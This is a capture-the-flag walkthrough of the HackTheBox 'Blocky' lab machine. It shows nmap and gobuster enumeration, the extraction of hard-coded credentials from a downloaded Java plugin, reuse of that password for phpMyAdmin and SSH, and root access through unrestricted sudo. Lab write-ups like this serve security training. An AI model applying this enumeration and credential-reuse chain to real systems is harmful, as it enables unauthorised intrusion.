HackTheBox - Blocky
Blocky is one of the easiest machine on the HackTheBox, based on misconfiguration and Hard-coded credentials in java class.
Reconnaissance and Enumeration
Let’s start with typical nmap scan to check open ports. I’m using the -T5 switch to speed up scanning.
┌──(vq4s㉿kali)-[~/Downloads]
└─$ nmap -sC -sV -T5 blocky.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 03:38 CET
Nmap scan report for blocky.htb (10.10.10.37)
Host is up (0.038s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
|_http-generator: WordPress 4.8
8192/tcp closed sophos
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds
As we can see ports 21 (ProFTPD 1.3.5a), 22 (ssh) and 80 are open with WordPress page.
Gobuster to enumerate directories on the server.
┌──(vq4s㉿kali)-[~/Downloads]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://blocky.htb
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://blocky.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wiki (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/wp-content (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/plugins (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/wp-includes (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
/javascript (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
/wp-admin (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]
/phpmyadmin (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
We can see, default Wordpress folders like /wp-admin with login panel, /wp-includes contains core of Wordpress, /phpMyAdminwhich will definitely be useful in the later stages.
Among the interesting findings is the /plugins directory, which contains two files: BlockyCore.jar and griefprevention-1.11.2-3.1.1.298.jar. Let’s download them and see what’s inside.
It’s Java class file. We can open it using an online decompiler or code editor. I opened it in IntelliJ to check what this class contains.
The class contains hard-coded credentials for database access. We previously discovered the /phpmyadmin directory, so let’s check if these login credentials work there.
Bingo, login and password worked, and now we have full access to the entire database, including user information and other stored data, with this access we can try to find table with usernames.
I found the wp-users table, which contains a user named Notch. We we can try to login into SSH with known usernames (root, notch) and hard-coded password in java class file.
Exploitation
┌──(vq4s㉿kali)-[~/Downloads]
└─$ ssh root@blocky.htb
root@blocky.htb's password:
Permission denied, please try again.
root@blocky.htb's password:
┌──(vq4s㉿kali)-[~/Downloads]
└─$ ssh notch@blocky.htb
notch@blocky.htb's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Fri Jul 8 07:16:08 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
We can login to ssh with notch username and provided password, so now we are able to check user flag.
otch@Blocky:~$ ll
total 40
drwxr-xr-x 5 notch notch 4096 Jul 8 2022 ./
drwxr-xr-x 3 root root 4096 Jul 2 2017 ../
-rw------- 1 notch notch 1 Dec 24 2017 .bash_history
-rw-r--r-- 1 notch notch 220 Jul 2 2017 .bash_logout
-rw-r--r-- 1 notch notch 3771 Jul 2 2017 .bashrc
drwx------ 2 notch notch 4096 Jul 2 2017 .cache/
drwxrwxr-x 7 notch notch 4096 Jul 2 2017 minecraft/
drwxrwxr-x 2 notch notch 4096 Jul 2 2017 .nano/
-rw-r--r-- 1 notch notch 655 Jul 2 2017 .profile
-r-------- 1 notch notch 33 Feb 23 20:35 user.txt
notch@Blocky:~$ wc user.txt
1 1 33 user.txt
Privilege Escalation
As always, I checked sudo -l command, this command is used to display a list of commands which user can execute with root privilages, in this case we can use every command.
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
Since we can execute all commands, we can simply switch to the root user and retrieve the root flag.
notch@Blocky:~$ sudo su - root
root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Blocky:~# cd /root/
root@Blocky:~# ll
total 28
drwx------ 3 root root 4096 Feb 23 20:35 ./
drwxr-xr-x 23 root root 4096 Jun 2 2022 ../
-rw------- 1 root root 1 Dec 24 2017 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwx------ 2 root root 4096 Jun 7 2022 .cache/
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 33 Feb 23 20:35 root.txt
root@Blocky:~# wc root.txt
1 1 33 root.txt